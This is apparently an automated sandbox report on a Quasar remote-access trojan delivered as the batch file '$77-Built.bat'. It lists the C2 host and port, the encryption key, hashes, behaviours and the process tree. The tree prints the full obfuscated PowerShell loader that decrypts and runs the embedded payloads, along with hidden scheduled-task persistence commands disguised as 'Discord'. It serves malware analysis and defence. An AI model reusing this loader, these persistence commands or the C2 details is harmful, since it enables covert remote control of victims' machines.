Analysis
max time kernel: 84s
max time network: 92s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 26-05-2024 19:38
Static task: static1
Behavioral task: behavioral1
  Sample: $77-Built.bat
  Resource: win10-20240404-en
Behavioral task: behavioral2
  Sample: $77-Built.bat
  Resource: win10v2004-20240508-en
General
Target: $77-Built.bat
Size: 3.5MB
MD5: 297d7e65305917b5a212ca9f4b4d99d2
SHA1: 402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256: cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA512: 6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
SSDEEP: 49152:cYbGAyBfhKnc19015vyfIchfKpcuGj8RmSMvANLFt/X9oS4ot3X3tLdDh:cG
Malware Config
Extracted
Family: quasar
reconnect_delay: 3000

Extracted
Family: quasar
Version: 1.4.1
Botnet: Rootkit
C2: uk2.localto.net:3444
Mutex: 13b8023a-5596-4efa-b088-c87d2ca4e84f
Attributes:
  encryption_key: 6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
  install_name: $77-powershell.exe
  log_directory: $77-Logs
  reconnect_delay: 3000
  startup_key: Discord
  subdirectory: $77-Rootkit
Signatures
Quasar payload (4 IoCs)
Processes:
  resource | yara_rule
  behavioral3/memory/3432-14-0x0000024FFE190000-0x0000024FFE62E000-memory.dmp | family_quasar
  behavioral3/memory/2276-52-0x000001E8F0690000-0x000001E8F09B4000-memory.dmp | family_quasar
  C:\Users\Admin\AppData\Local\Temp\Client-built.exe | family_quasar
  behavioral3/memory/2348-70-0x0000000000550000-0x0000000000874000-memory.dmp | family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
Processes:
  description | pid | process | target process
  PID 1216 created 636 | 1216 | powershell.EXE | winlogon.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)
Run PowerShell and hide display window.
Processes:
  pid | process
  1820 | powershell.exe
  2276 | powershell.exe
  3432 | powershell.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Executes dropped EXE (4 IoCs)
Processes:
  pid | process
  2040 | Install.exe
  2348 | Client-built.exe
  2908 | $77-powershell.exe
  4484 | $77-powershell.exe
Drops file in System32 directory (5 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Tasks\Discord | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
Suspicious use of SetThreadContext (1 IoCs)
Processes:
  description | pid | process | target process
  PID 1216 set thread context of 4812 | 1216 | powershell.EXE | dllhost.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
  Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
  Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Creates scheduled task(s) (1 TTPs, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  3132 | schtasks.exe
  1324 | schtasks.exe
  236 | schtasks.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes: svchost.exe, powershell.EXE
Modifies registry class (1 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | powershell.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe, $77-powershell.exe, Client-built.exe, powershell.EXE, dllhost.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
Processes:
  pid | process
  3316 | Explorer.EXE (4 occurrences)
Suspicious use of SendNotifyMessage (4 IoCs)
Processes:
  pid | process
  3316 | Explorer.EXE (4 occurrences)
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
  pid | process
  4484 | $77-powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: cmd.exe, powershell.exe, WScript.exe, powershell.EXE, dllhost.exe
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree level in brackets; child processes are indented under their parent)
[1] C:\Windows\system32\winlogon.exe
    Command line: winlogon.exe
    PID: 636
  [2] C:\Windows\system32\dwm.exe
      Command line: "dwm.exe"
      PID: 480
  [2] C:\Windows\System32\dllhost.exe
      Command line: C:\Windows\System32\dllhost.exe /Processid:{3d0e1e1b-373a-41dd-8190-56b351c2d29f}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 4812
[1] C:\Windows\system32\lsass.exe
    Command line: C:\Windows\system32\lsass.exe
    PID: 688
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    PID: 996
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
    PID: 708
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
    PID: 892
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
    PID: 1076
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
    PID: 1092
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    - Drops file in System32 directory
    PID: 1208
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      Command line: character-code-obfuscated PowerShell loader (script body omitted)
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 1216
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
    PID: 1236
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
    PID: 1288
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
    PID: 1352
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
    PID: 1372
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    PID: 1400
  [2] C:\Windows\system32\sihost.exe
      Command line: sihost.exe
      PID: 1908
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
    - Drops file in System32 directory
    PID: 1496
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
    PID: 1604
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
    PID: 1620
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
    PID: 1732
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
    PID: 1752
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k NetworkService -p
    PID: 1772
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1812
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
    PID: 1856
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1872
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1896
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
    PID: 2008
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
    PID: 2024
[1] C:\Windows\System32\spoolsv.exe
    Command line: C:\Windows\System32\spoolsv.exe
    PID: 2080
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
    PID: 2248
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
    PID: 2420
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
    PID: 2528
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
    PID: 2536
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k NetworkService -p
    - Modifies data under HKEY_USERS
    PID: 2568
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
    PID: 2620
[1] C:\Windows\sysmon.exe
    Command line: C:\Windows\sysmon.exe
    PID: 2640
[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
    PID: 2672
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
    PID: 2684
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
    PID: 2692
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    PID: 2652
[1] C:\Windows\system32\wbem\unsecapp.exe
    Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID: 796
[1] C:\Windows\Explorer.EXE
    Command line: C:\Windows\Explorer.EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID: 3316
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77-Built.bat"
      - Suspicious use of WriteProcessMemory
      PID: 1828
    [3] C:\Windows\System32\Conhost.exe
        Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID: 424
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77-Built.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77-Built.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        - Command and Scripting Interpreter: PowerShell
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 3432
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_228_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_228.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_228.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_228.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_228.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_228.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2348 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:1324 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4484 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
PID:236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3804
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:3132 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3476
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4372
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1008
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3016
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:4900
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: df472dcddb36aa24247f8c8d8a517bd7
SHA1: 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256: e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512: 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: eb15ee5741b379245ca8549cb0d4ecf8
SHA1: 3555273945abda3402674aea7a4bff65eb71a783
SHA256: b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512: 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe
Filesize: 3.1MB
MD5: 4de93a204d54204a0798175c8457a2de
SHA1: 38abe30fa70c599846e0b777d4ee62422781837f
SHA256: 7333499e805ad534c6f65623adf4600c0484830cefa08c0a75f98b46a929fefb
SHA512: e3ae4e2c84dec014dd15bc29faa9767214972eef8bdee9db063f4fbe059549212f17c69f06a78a12880f53a766e357c73eae6763f2452fb4eff2302f5396304a
-
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize: 163KB
MD5: b51552b77057c2405f73bbbf9c89234a
SHA1: 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256: 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512: 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lovzdlng.f0x.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
Filesize: 440KB
MD5: 0e9ccd796e251916133392539572a374
SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\AppData\Roaming\startup_str_228.bat
Filesize: 3.5MB
MD5: 297d7e65305917b5a212ca9f4b4d99d2
SHA1: 402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256: cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA512: 6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
C:\Users\Admin\AppData\Roaming\startup_str_228.vbs
Filesize: 115B
MD5: a3eff77a8bb96c7ea21bade46304b184
SHA1: 17d8dc720fe37f86b78b2983e742d826bbdadd04
SHA256: b716dbc43ab756db989f684a616834181fe3ca71a848933349fa1e4a0b447515
SHA512: ed4625deb3fab7a532418ed9f0189fb109eb92e66e6169b05133e991607bbc4469cb3558c745549b4a2d09c2290b09f310d1bf9efdc2c553de05b4105924a2c7
-
memory/480-141-0x0000021D6D910000-0x0000021D6D93A000-memory.dmp
Filesize: 168KB
-
memory/480-146-0x0000021D6D910000-0x0000021D6D93A000-memory.dmp
Filesize: 168KB
-
memory/480-147-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmp
Filesize: 64KB
-
memory/636-111-0x000002504D340000-0x000002504D36A000-memory.dmp
Filesize: 168KB
-
memory/636-116-0x000002504D340000-0x000002504D36A000-memory.dmp
Filesize: 168KB
-
memory/636-117-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmp
Filesize: 64KB
-
memory/636-109-0x000002504D310000-0x000002504D335000-memory.dmp
Filesize: 148KB
-
memory/636-110-0x000002504D340000-0x000002504D36A000-memory.dmp
Filesize: 168KB
-
memory/688-127-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmp
Filesize: 64KB
-
memory/688-121-0x00000199FDA50000-0x00000199FDA7A000-memory.dmp
Filesize: 168KB
-
memory/688-126-0x00000199FDA50000-0x00000199FDA7A000-memory.dmp
Filesize: 168KB
-
memory/708-157-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmp
Filesize: 64KB
-
memory/708-151-0x0000016797B20000-0x0000016797B4A000-memory.dmp
Filesize: 168KB
-
memory/708-156-0x0000016797B20000-0x0000016797B4A000-memory.dmp
Filesize: 168KB
-
memory/996-131-0x000001A57ECF0000-0x000001A57ED1A000-memory.dmp
Filesize: 168KB
-
memory/996-137-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmp
Filesize: 64KB
-
memory/996-136-0x000001A57ECF0000-0x000001A57ED1A000-memory.dmp
Filesize: 168KB
-
memory/1216-93-0x000001C1AB990000-0x000001C1AB9BA000-memory.dmp
Filesize: 168KB
-
memory/1216-94-0x00007FFD22F60000-0x00007FFD23169000-memory.dmp
Filesize: 2.0MB
-
memory/1216-95-0x00007FFD22780000-0x00007FFD2283D000-memory.dmp
Filesize: 756KB
-
memory/1820-27-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/1820-30-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/1820-25-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/1820-26-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/1820-21-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/2276-52-0x000001E8F0690000-0x000001E8F09B4000-memory.dmp
Filesize: 3.1MB
-
memory/2348-70-0x0000000000550000-0x0000000000874000-memory.dmp
Filesize: 3.1MB
-
memory/3432-0-0x00007FFD020C3000-0x00007FFD020C5000-memory.dmp
Filesize: 8KB
-
memory/3432-9-0x0000024FFDBD0000-0x0000024FFDBF2000-memory.dmp
Filesize: 136KB
-
memory/3432-807-0x00007FFD020C3000-0x00007FFD020C5000-memory.dmp
Filesize: 8KB
-
memory/3432-806-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/3432-14-0x0000024FFE190000-0x0000024FFE62E000-memory.dmp
Filesize: 4.6MB
-
memory/3432-13-0x0000024FFD4C0000-0x0000024FFD4C8000-memory.dmp
Filesize: 32KB
-
memory/3432-12-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/3432-11-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
memory/3432-10-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmp
Filesize: 10.8MB
-
